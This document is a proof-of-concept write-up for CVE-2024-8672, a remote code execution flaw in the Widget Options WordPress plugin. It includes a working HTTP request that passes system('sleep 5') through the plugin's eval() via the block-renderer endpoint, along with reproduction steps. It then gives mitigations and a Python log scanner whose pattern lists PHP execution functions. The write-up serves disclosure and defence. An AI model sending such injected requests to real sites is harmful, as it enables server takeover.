
CVE-2024-8672 PoC — Widget Options – The #1 WordPress Widget & Block Control Plugin <= 4.0.7 - Authenticated (Contributor+) Remote Code Exec

Associated Vulnerability

Title: Widget Options – The #1 WordPress Widget & Block Control Plugin <= 4.0.7 - Authenticated (Contributor+) Remote Code Execution (CVE-2024-8672)

Description: The Widget Options – The #1 WordPress Widget & Block Control Plugin plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.0.7 via the display logic functionality that extends several page builders. This is due to the plugin allowing users to supply input that will be passed through eval() without any filtering or capability checks. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server. Special note: We suggested the vendor implement an allowlist of functions and limit the ability to execute commands to just administrators, however, they did not take our advice. We are considering this patched, however, we believe it could still be further hardened and there may be residual risk with how the issue is currently patched.
# CVE-2024-8672: Authenticated Contributor Remote Code Execution in Widget Options Plugin

## Description

The **Widget Options** WordPress plugin (version 4.0.7 and earlier) is vulnerable to **Authenticated Contributor Remote Code Execution (RCE)**. This vulnerability allows authenticated users with **Contributor** privileges or higher to execute arbitrary PHP code on the server. 

The issue arises from the `widgetopts_safe_eval()` function, which passes the user-supplied `logic` setting of a widget straight to `eval()` with no filtering and no capability check. Because the setting is reachable through the block-renderer REST endpoint, any account that can edit content can inject and execute PHP code.

## Vulnerability Details

- **Plugin:** Widget Options
- **Version:** 4.0.7 and earlier
- **Vulnerability Type:** Authenticated Remote Code Execution (RCE)
- **CVE:** [CVE-2024-8672](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/widget-options/widget-options-the-1-wordpress-widget-block-control-plugin-407-authenticated-contributor-remote-code-execution)
- **Exploitation Requirements:**
  - Valid credentials with **Contributor** or higher privileges.

## Proof of Concept (PoC)

The following example demonstrates how to exploit the vulnerability to execute the `sleep` command, causing a delay in the server's response.

### Request Example

```http
GET /wp-json/wp/v2/block-renderer/core/latest-comments?context=edit&attributes[commentsToShow]=5&attributes[displayAvatar]=true&attributes[displayDate]=true&attributes[displayExcerpt]=true&attributes[extended_widget_opts][class][logic]=system('sleep 5');&post_id=91&_locale=site HTTP/1.1
Host: localhost:5555
X-WP-Nonce: 365b68356c
Cookie: wordpress_logged_in_fake_cookie=invalid|123456789|fake_cookie
```

### Steps to Reproduce

1. Authenticate to WordPress with a Contributor account.
2. Obtain a valid **nonce** for API requests (e.g., using the browser DevTools while editing a post).
3. Send the crafted request to inject and execute the PHP logic.

## Impact

- Exploiting this vulnerability allows authenticated users to execute arbitrary PHP commands, leading to a full compromise of the WordPress site and its hosting server.

## Mitigation

To mitigate this issue:
- Update the **Widget Options** plugin to the patched version 4.0.8.
- Restrict access to Contributor accounts and review permissions.
- Use a Web Application Firewall (WAF) to block malicious requests, in particular block-renderer requests that carry an `extended_widget_opts[...][logic]` parameter containing function calls.
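As an added defender-side example (not part of the original PoC and not the plugin's code), the following Python scans constructed access-log lines for block-renderer requests that carry an `extended_widget_opts[...][logic]` parameter and flags values that contain PHP execution-style function calls; the log format, sample lines and function list are assumptions.

```python
"""Flag CVE-2024-8672-style requests in web server access logs (added example)."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# Nested query key for the Widget Options "logic" setting, as seen in the PoC request
LOGIC_KEY = re.compile(r"^attributes\[extended_widget_opts\]\[[^\]]*\]\[logic\]$")
# Function-call shapes that have no business in a display-logic expression (assumed list)
SUSPICIOUS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert|file_put_contents)\s*\(",
    re.I,
)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines in combined log format; this is not real traffic
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /wp-json/wp/v2/block-renderer/core/latest-comments?context=edit&attributes%5Bextended_widget_opts%5D%5Bclass%5D%5Blogic%5D=system%28%27sleep+5%27%29%3B&post_id=91 HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2025:10:00:01 +0000] "GET /wp-json/wp/v2/block-renderer/core/latest-comments?context=edit&attributes%5Bextended_widget_opts%5D%5Bclass%5D%5Blogic%5D=is_user_logged_in%28%29&post_id=91 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2025:10:00:02 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 2048
"""


def logic_values(target: str) -> List[str]:
    """Return every value submitted under an extended_widget_opts[...][logic] key."""
    query = urlsplit(target).query  # parse_qsl URL-decodes keys and values
    return [v for k, v in parse_qsl(query, keep_blank_values=True) if LOGIC_KEY.match(k)]


def classify_line(line: str) -> Optional[str]:
    """Return 'rce_attempt', 'logic_set', or None for one log line."""
    m = REQUEST_RE.search(line)
    if not m or "/block-renderer/" not in m.group("target"):
        return None
    values = logic_values(m.group("target"))
    if not values:
        return None
    return "rce_attempt" if any(SUSPICIOUS.search(v) for v in values) else "logic_set"


def scan(log_text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, verdict) for each line that carries a logic expression."""
    hits = []
    for line in log_text.splitlines():
        verdict = classify_line(line)
        if verdict:
            hits.append((line.split(" ", 1)[0], verdict))
    return hits


if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

Any `logic_set` hit from a non-administrator account is worth a second look even after patching, since the vendor did not restrict the feature to administrators.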

## Proof of Execution

The following screenshot demonstrates the execution of the `sleep` command via the provided PoC, showing the delayed response time.

![Proof of Concept Screenshot](img/CVE-2024-8672.png)